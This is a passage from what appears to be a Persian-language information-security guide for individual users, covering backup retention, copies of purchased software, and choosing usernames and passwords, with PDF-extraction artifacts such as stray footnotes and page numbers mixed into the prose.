ﺷـﺪﻩ ﺑﺎﺷﺪ ﺁﻳﺎ ﺍﻣﺮﻭﺯ ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﭘـﻨﺞ ﺍﻳﻨﭽـﻲ ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﺁﻥ ﭘﻴﺪﺍ ﻛﺮﺩ؟ ﭼﻨﺪ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﺩ؟ ﺍﮔﺮ ﺷﻤﺎ ﻫﻔﺘﻪ ﺍﻱ ﻳﻜﺒﺎﺭ ﺍﺯ ﺁﻧﭽـﻪ ﺩﺍﺭﻳـﺪ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ ﺩﺭﺻﻮﺭﺕ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﻳﻚ ﻓﺎﺟﻌﺔ ﻣﺼﻴﺒﺖﺑﺎﺭ ،ﺣﺪﺍﻛﺜﺮ ﺍﻃﻼﻋـﺎﺕ ﻳﻚ ﻫﻔﺘـﻪ ﺭﺍ ﺍﺯ ﺩﺳـﺖ ﺧﻮﺍﻫﻴـﺪ ﺩﺍﺩ .ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ ﺍﻣﻨﻴﺘﻲ ﻗﺎﺑﻞ ﺗﻮﺟﻴﻪ ﺍﺳﺖ ﻭﻟﻲ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﻓﻀﺎﻱ ﺍﺷﻐﺎﻝﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮ ﻣـﻲﺷـﻮﺩ .ﭼـﻪ ﺗﻌـﺪﺍﺩ ﺍﺯ ﺍﻳـﻦ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﺎﻳﺪ ﻧﮕﻪ ﺩﺍﺷﺖ؟ ﺍﮔﺮ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻭ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺩﻟﻴﻠﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺑﺨﻮﺍﻫﻴـﺪ ﺁﻧﻬﺎ ﺭﺍ ﺳﺮﻳﻊ ﺩﻭﺭ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ ،ﭼﻮﻥ ﺣﺠﻢ ﻛﻤـﻲ ﺩﺍﺭﻧـﺪ ﻭ ﻗﺎﺑﻠﻴـﺖ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺠﺪﺩ ﻫـﻢ ﻧﺪﺍﺭﻧـﺪ؛ ﺍﻣـﺎ ﻫﻤـﻮﺍﺭﻩ ﺑﺎﻳـﺪ ﭼﻨـﺪ ﻧـﺴﺨﻪ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻳﺪ .ﺩﺭ ﺗﻤﺎﻡ ﻣﺜﺎﻟﻬﺎﻱ ﺑﺎﻻ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﭼﻬـﺎﺭ ﻧﺴﺨﺔ ﺁﺧﺮ ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ. ﭼﺮﺍ ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﻳﻨﮕﻮﻧﻪ ﻋﻤﻞ ﺷﻮﺩ؟ ﭼﺮﺍ ﺑﺎﻳﺪ ﻧﺴﺨﺔ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﻣــﺎﻩ ﻗﺒــﻞ ﺭﺍ ﺩﺭ ﺷــﺮﺍﻳﻄﻲ ﻛــﻪ ﻧــﺴﺨﺔ ﺟﺪﻳــﺪﺗﺮﻱ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ؟ ﺩﻟﻴـﻞ ﺁﻥ ﺳـﺎﺩﻩ ﺍﺳـﺖ :ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻧـﺴﺨﺔ ﺁﺧﺮﻱ ﻛﻪ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩﺍﻳﺪ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻧﺒﺎﺷﺪ ،ﮔﻢ ﺷﻮﺩ ،ﻭ ﻳﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻭﺩ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮﭼـﻪ ﻧـﺴﺨﻪﻫـﺎﻱ ﻼ ﺑـﻪ ﺭﻭﺯ ﻧﻴـﺴﺘﻨﺪ ،ﻭﻟـﻲ ﺑﻮﺩﻧـﺸﺎﻥ ﺑﻬﺘـﺮ ﺍﺯ ﻣﺎﻫﻬﺎﻱ ﻗﺒﻠﻲ ﻛﺎﻣ ﹰ ﻧﺒﻮﺩﻧﺸﺎﻥ ﺍﺳﺖ .ﺍﻳﻦ ﻣﻮﺭﺩ ﻳﻚ ﻣﺜﺎﻝ ﺩﻳﮕﺮ ﺍﺯ ﺍﻳﻦ ﻧﻜﺘـﻪ ﺍﺳـﺖ ﻛﻪ ﺍﻳﻤﻨـﻲ ﺳـﻄﺢ ﺑـﺎﻻ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﭼﻨﺪﮔﺎﻧـﻪ ﻭ ﺗـﺎ ﺣـﺪﻭﺩﻱ ﺗﻜﺮﺍﺭﺷﺪﻩ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ. ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﺮﻳﺪﺍﺭﻱﺷﺪﻩ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ ﺍﮔﺮ ﮔﻮﺍﻫﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺧﺮﻳﺪﺍﺭﻱ ﻛﺮﺩﻩﺍﻳـﺪ ﺍﻳـﻦ ﺍﺟـﺎﺯﻩ ﺭﺍ ﻣﻲﺩﻫﺪ ،ﻫﻤﻴﺸﻪ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﺓ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻳـﻚ ﻧـﺴﺨﺔ ﺛﺎﻧﻮﻳﻪ ﺗﻬﻴﻪ ﻛـﺮﺩﻩ ﻭ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ ﻋﻤﻠﻴـﺎﺕ ﻧـﺼﺐ ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ. ﻣﻬﻤﺘﺮﻳﻦ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻬﻤﺘﺮﻳﻦ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﺩﺭ ﻓﻮﺍﺻـﻞ ﺯﻣـﺎﻧﻲ ﻣـﻨﻈﻢ ﺻـﻮﺭﺕ ﺑﮕﻴـﺮﺩ. 
ﺑﻌﻀﻲ ﺍﺷﺨﺎﺹ ﺯﺣﻤﺖ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﻧﻤـﻲﺩﻫﻨـﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻋﻮﺍﻗﺐ ﺍﻳﻨﻜﺎﺭ ﺧﻮﺩ ﮔﺮﻓﺘـﺎﺭ ﺷـﻮﻧﺪ .ﺍﻳـﻦ ﺍﻓـﺮﺍﺩ ﻋﻤﻮﻣﹰﺎ ﻭﻗﺘﻲ ﻫﻢ ﻛﻪ ﺑﺎ ﻣﺸﻜﻠﻲ ﺭﻭﺑﺮﻭ ﻣﻲﺷﻮﻧﺪ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻨـﺪ ﻣﺸﻜﻞ ﺩﻳﮕﺮ ﺗﻜﺮﺍﺭ ﻧﺨﻮﺍﻫﺪ ﺷﺪ .ﻫﻤﭽﻨﺎﻥ ﺗﻮﺻﻴﺔ ﻣﺎ ﺍﻳﻦ ﺍﺳـﺖ ﻛﻪ ﺍﺯ ﻣﺨﺎﻃﺮﺓ ﺍﺣﺘﻤﺎﻟﻲ ﭘﻴﺸﮕﻴﺮﻱ ﻛﻨﻴﺪ ﻭ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ. ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ٢٣ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪ ﺑﺪﺍﻧـﺪ ﺷﻤﺎ ﭼﻪ ﻛﺴﻲ ﻫﺴﺘﻴﺪ .ﺍﻳﻦ ﺩﺍﻧﺎﻳﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑﺘـﻮﺍﻥ ﺍﺯ ﻻ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ ﺗﻘﻠﺐ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ .ﻣﻌﻤﻮ ﹰ ﻋﺒﻮﺭ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻳﺪ ،ﻫﺮﭼﻨﺪ ﮔﻮﻧـﻪﻫـﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺯ ﺍﻳـﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻧﻜﺘﺔ ﻗﺎﺑﻞ ﺗﻮﺟـﻪ ﺍﻳـﻦ ﺍﺳـﺖ ﻛﻪ ﺑﺎﻳﺪ ﻛﻠﻤﺎﺗﻲ ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ ﻛـﻪ ﻧﺘـﻮﺍﻥ Authentication 23 ٦١ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺍﺣﺘﻲ ﺣﺪﺱ ﺯﺩ ﺗﺎ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻨـﺪ. ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺑﺎﻳﺪ ﻳﺎﺩﺁﻭﺭﻱ ﺁﻥ ﻛﻠﻤﺎﺕ ﺩﺭ ﺣﺎﻓﻈﻪ ﻧﻴﺰ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﺑﺎﺷﺪ ﻭ ﺷﺨﺺ ﺁﻧﻬﺎ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﺪ .ﺍﮔﺮ ﺷﻤﺎ ﻣﺮﺗﺒﹰﺎ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﻭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭ ﺗﻤﺎﺱ ﺑﺎﺷﻴﺪ ﻗﺎﻋﺪﺗﹰﺎ ﺗﺎ ﻛﻨﻮﻥ ﻧﺎﻣﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺯﻳﺎﺩﻱ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻩﺍﻳـﺪ ،ﺍﻣـﺎ ﺍﮔـﺮ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﺮ ﺭﻭﻱ ﻳﻚ ﻛﺎﻏﺬ ﻧﺰﺩﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻧﻮﺷﺘﻪﺍﻳﺪ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺍﺯ ﺍﻣﻨﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺘﻨﺪ. ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓـﺮﺍﺩ ﺍﺯ ﺁﻧﻬـﺎ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﻛـﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺍﺣﺮﺍﺯ ﻛﻨﻨﺪ .ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺨﺘﻠﻔﻲ ﺍﻧﺠﺎﻡ ﺷـﻮﺩ :ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ،ﺷـﻤﺎﺭﺓ ﻋﻀﻮﻳﺖ ،ﺍﺳﻢ ﻋﻀﻮ ﻭ...؛ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻣﺒﺎﺣـﺚ ﻋﻤﻮﻣـﹰﺎ ﺍﺯ ﻧـﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲ ﺷـﻮﺩ .ﺩﺭ ﺑﻌـﻀﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑﺠـﺎﻱ ﻧـﺎﻡ ﻛــﺎﺭﺑﺮﻱ ﺍﺯ ﺁﺩﺭﺱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﺷــﻮﺩ .ﺩﺭ ﺣﻘﻴﻘﺖ ﺩﺭ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻌﻨـﻮﺍﻥ ﻧﻤﺎﺩﻱ ﺧﺎﺹ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺗﻠﻘﻲ ﻣﻲﮔـﺮﺩﺩ .ﺩﺭ ﺧـﺼﻮﺹ ﻧـﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻗﻮﺍﻧﻴﻦ ﻣﺨﺘﻠﻔﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ: • ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻃﻮﻝ ﺍﺳﻢ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﻨـﺪ ﻭﻟـﻲ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺁﻥ ﻣﺤﺪﻭﺩﻳﺘﻲ ﻗﺎﺋﻞ ﻧﻤﻲﺷﻮﻧﺪ. • ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻫـﺮ ﻋﻼﻣﺘـﻲ -ﻛـﻪ ﺑﻮﺳﻴﻠﺔ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻗﺎﺑﻞ ﻧﻮﺷﺘﻦ ﺑﺎﺷﺪ -ﺩﺭ ﺗﺮﻛﻴﺐ ﻧـﺎﻡ ﻛــﺎﺭﺑﺮﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﻛــﺮﺩ ،ﻭﻟــﻲ ﺑﻌــﻀﻲ ﺩﻳﮕــﺮ ﻓﻘــﻂ ﺩﺭ ﻣﺤﺪﻭﺩﺓ ﺣـﺮﻭﻑ ﻭ ﺍﻋـﺪﺍﺩ ﻭ ﻓﻘـﻂ ﺍﻧـﺪﻛﻲ ﺩﺭ ﻣﺤـﺪﻭﺩﺓ ﻋﻼﺋﻢ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ. • ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺣـﺮﻭﻑ ﺑـﺰﺭﮒ ﻭ ﻛﻮﭼـﻚ ﺭﺍ ﻳﻜـﺴﺎﻥ ﺩﺭﻧﻈﺮ ﻣﻲﮔﻴﺮﻧﺪ ﻭﻟﻲ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺎ ﺁﻧﻬـﺎ ﺑـﻪ ﻣﻨﺰﻟـﺔ ﺩﻭ ﺣﺮﻑ ﻣﺘﻔﺎﻭﺕ ﺑﺮﺧﻮﺭﺩ ﻣﻲﻛﻨﻨﺪ. 
ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﺷﻤﺎ ﺍﻣﻜﺎﻥ ﺍﻧﺘﺨﺎﺏ ﻧﺪﻫـﺪ ،ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﺷـﻤﺎ ﻫﻤﺎﻧﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﺳﻴﺴﺘﻢ ﺗﻌﻴﻴﻦ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻣﺎ ﺍﮔﺮ ﻻﺯﻡ ﺑﺎﺷﺪ ﺧﻮﺩﺗﺎﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ ﭼﻪ ﻧﻜـﺎﺗﻲ ﺭﺍ ﺑﺎﻳـﺪ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ؟ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩ ﺍﺳﺖ: • ﺁﻳﺎ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ ﺷﻤﺎ ﺑﺎﺷﺪ؟ ﺁﻳﺎ ﻗﺮﺍﺭ ﺍﺳـﺖ ﺍﻳـﻦ ﺍﺳـﻢ ﻛﻤـﻚ ﻛﻨـﺪ ﻛـﻪ ﺩﻭﺳﺘﺎﻥ ﻭ ﻫﻤﻜﺎﺭﺍﻧﺘﺎﻥ ﺷـﻤﺎ ﺭﺍ ﺑـﺸﻨﺎﺳﻨﺪ؟ ﻳـﻚ ﺁﺩﺭﺱ • ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﺎ ﺍﻧﺘﺨﺎﺏ ﻧﺎﻡ ﻣﻮﺭﺩ ﻧﻈـﺮ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ ﻧﮕﻪ ﺩﺍﺭﻳﺪ؟ ﺍﮔﺮ ﺑﻮﺳﻴﻠﺔ ﺍﻳﻦ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻼ ﻳـﻚ ﺑـﺎﺯﻱ ﺩﺭ ﻳﻚ ﻓﻌﺎﻟﻴﺖ ﮔﺮﻭﻫﻲ ﺷﺮﻛﺖ ﻣﻲﻛﻨﻴﺪ )ﻣﺜ ﹰ ﺍﻳﻨﺘﺮﻧﺘﻲ( ﺷﺎﻳﺪ ﻧﺨﻮﺍﻫﻴﺪ ﺩﻳﮕﺮﺍﻥ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ ﺷـﻤﺎ ﺭﺍ ﺑﺪﺍﻧﻨﺪ. • ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻧﺎﻣﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﻳﺎﺩﺁﻭﺭﻱ ﺁﻥ ﺁﺳﺎﻥ ﺑﺎﺷﺪ؟ ﭼﻨﺎﻧﭽﻪ ﺍﺯ ﻳﻚ ﺧﺪﻣﺖ ﺑﺮﺧﻂ ٢٤ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛـﻪ ﺑﻪ ﻧﺪﺭﺕ ﺁﻧﺮﺍ ﺑﻜﺎﺭ ﻣﻲ ﮔﻴﺮﻳﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺍﺯ ﺍﺳﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﺣﺘﻲ ﺩﺭ ﺫﻫﻦ ﺑﻤﺎﻧـﺪ .ﺑﻌـﻀﻲ ﺍﻓﺮﺍﺩ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﺍﺯ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺁﻥ ﺧـﺪﻣﺎﺕ ﺑـﺎ ﻧﻜﺘـﺔ ﻣﻬـﻢ ﻭ ﺣﺴﺎﺳﻲ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻧﺒﺎﺷﻨﺪ. • ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺣﺪﺱ ﺯﺩﻥ ﻧﺎﻣﻲ ﻛﻪ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻳﺪ ﺑـﺮﺍﻱ ﺩﻳﮕﺮﺍﻥ ﻣﺸﻜﻞ ﺑﺎﺷﺪ؟ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺣﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﺷـﻤﺎ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻌﻴﻴﻦ ﺷﻮﺩ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺭﺍﺣﺘـﻲ ﺁﻧﺮﺍ ﺣﺪﺱ ﺑﺰﻧﻨﺪ )ﺟﻬﺖ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻻﺯﻡ ﺑﺎﻳـﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﭼﻨﺪﻻﻳﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺍﮔﺮ ﺍﺯ ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻋﻤﻮﻣﻲ ﺧﻮﺩ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺎﻧﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ،ﺣـﺪﺱﺯﺩﻥ ﺁﻥ ﺑـﺮﺍﻱ ﺳﺎﺭﻗﺎﻥ ﺳﺎﺩﻩﺗﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ(. ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺭ ﺑﻌــﻀﻲ ﺳﻴــﺴﺘﻤﻬﺎ ﻧــﺎﻡ ﻛــﺎﺭﺑﺮﻱ ﺍﺯ ﺳــﻮﻱ ﺳﻴــﺴﺘﻢ ﺗﻌﻴــﻴﻦ ﻣﻲﺷﻮﺩ ،ﻭﻟﻲ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﻠﻤﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻫﺮ ﺻﻮﺭﺕ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﺗﻌﻴﻴﻦ ﻣﻲﮔﺮﺩﺩ ﻭ ﺷﻜﻞ ﺁﻥ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﮕﻮﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ ﺣﺪﺱ ﺯﺩﻧﺶ ﺗﻮﺳﻂ ﺍﺷﺨﺎﺹ ﺩﻳﮕﺮ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ. ﺯﻣﺎﻧﻴﻜﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺳﻴـﺴﺘﻢ ﻣﻴﺰﺑـﺎﻥ ﺫﺧﻴـﺮﻩ ﻣـﻲﺷـﻮﻧﺪ ﻻ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲ ﺷﻮﻧﺪ ﺗﺎ ﺍﮔﺮ ﻛﺴﻲ ﺑﻪ ﺩﻳﺴﻚ ﺩﺳﺘﺮﺳـﻲ ﻣﻌﻤﻮ ﹰ ﭘﻴﺪﺍ ﻛﺮﺩ ﻗﺎﺩﺭ ﺑﻪ ﻣﺸﺎﻫﺪﺓ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﺒﺎﺷﺪ .ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﺍﻳﻦ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺭﻣﺰﻫـﺎﻱ ﻋﺒﻮﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻪ ﺁﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﺴﻮﻳﻪ ٢٥ﻣﻲﮔﻮﻳﻨﺪ .ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭﻗﺘﻲ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺭﺍ ﻭﺍﺭﺩ ﻣﻲﻛﻨﻴﺪ ،ﺍﺑﺘﺪﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﺎ ﻧﺴﺨﺔ ﺫﺧﻴﺮﻩﺷﺪﻩ Online Service One-way Encryption 24 25 ﺑﺨﺶ ﺩﻭﻡ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ ﻻ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭼﻨﻴﻦ ﻧﻤـﺎﺩﻱ ﺍﺯ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻌﻤﻮ ﹰ ﻛﺎﺭﺑﺮ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ. 
